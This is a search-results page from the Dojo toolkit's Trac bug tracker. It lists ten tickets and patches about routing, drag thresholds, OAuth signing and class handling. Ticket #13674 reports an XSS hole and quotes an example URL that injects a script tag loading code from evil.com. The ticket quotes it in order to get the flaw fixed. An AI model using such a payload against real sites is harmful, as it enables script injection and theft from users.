Dojo
  • Login
  • Preferences
  • Help/Guide
  • About Trac
  • Forgot your password?
  • Wiki
  • Timeline
  • Roadmap
  • View Tickets
  • Search
  • Ticket Graph

Context Navigation



Results (1 - 10 of 23)

1 2 3 →
#17043: defect: dojox.rpc.Service incorrect naming conflic detection when generating ... (closed: fixed)
line 65: if(this[method]){ it should be: if(this[serviceName]){ "method" here is actually the smd object.
By jinlan — Apr 18, 2013, 1:08:40 PM
#15247: feature: Router component (closed: fixed)
Ticket for new router component.
By Colin Snover — Apr 24, 2012, 11:16:34 PM
#14618: task: Update dojox/widget/UpgradeBar to work with dojo/sniff (closed: fixed)
The new {{{dojo/sniff}}} module landed recently, so it's time to update the !UpgradeBar (specifically the tests) to use it rather than {{{dojo.isIE}}}, etc.
By Revin Guillen — Jan 13, 2012, 6:22:35 PM
#13674: defect: borderContainer.php should not allow script attacks (closed: fixed)
We need to plug this security hole: {{{ http://projecttests.customer.com/dojo1.7/dijit/tests/layout/borderContainer.php?id=<script src=http://evil.com/xss/hack.js></script> }}}
By Douglas Hays — Aug 11, 2011, 9:17:01 PM
addClassUndefined.patch (Ticket #11146)
Allow undefined classStr parameter to addClass and toggleClass, plus a test for such usage
By Revin Guillen — May 14, 2010, 6:42:34 PM
#11146: defect: [REGRESSION] addClass and toggleClass can't handle an undefined ... (closed: fixed)
r19075 seems to have broken the handling for {{{dojo.addClass(node, some_undefined_variable)}}} and {{{toggleClass(node)}}}. In 1.3, these run without error, but in 1.4, it throws an error. Calling these functions this way is an obvious pr ...
By Revin Guillen — May 14, 2010, 6:41:51 PM
#8417: defect: OAuth signing breaks unless query string content is manually added to ... (closed: wontfix)
`dojox.io.OAuth.sign` seems to erroneously require query string vars to be included in the `url` property of the kwArgs. I would expect to be able to do, e.g.: {{{ dojo.xhrGet(dojox.io.OAuth.sign("GET", { url: "http://domain.com/some ...
By Revin Guillen — Jan 14, 2009, 5:38:06 PM
tree-dnd-drag-threshold.patch (Ticket #7437)
Allow dijit.Tree DnD to specify a drag threshold; Revin Guillen, CLA on file
By Revin Guillen — Aug 14, 2008, 5:57:41 PM
#7437: enhancement: [patch][cla] Allow dijit.Tree to specify a drag threshold (closed: fixed)
#7436 has a patch to allow you to specify a drag threshold for dojo.dnd.Source as a guard against accidental drags. Attached is a patch to add the same behavior to the dijit.Tree DnD implementation.
By Revin Guillen — Aug 14, 2008, 5:57:08 PM
dnd-source-delay.patch (Ticket #7436)
Allow dojo.dnd.Source to specify a drag threshold; Revin Guillen, CLA on file
By Revin Guillen — Aug 14, 2008, 5:29:23 PM
1 2 3 →
Note: See TracSearch for help on searching.

Trac Powered

Powered by Trac 1.2
By Edgewall Software.

Visit Dojo at
http://dojotoolkit.org/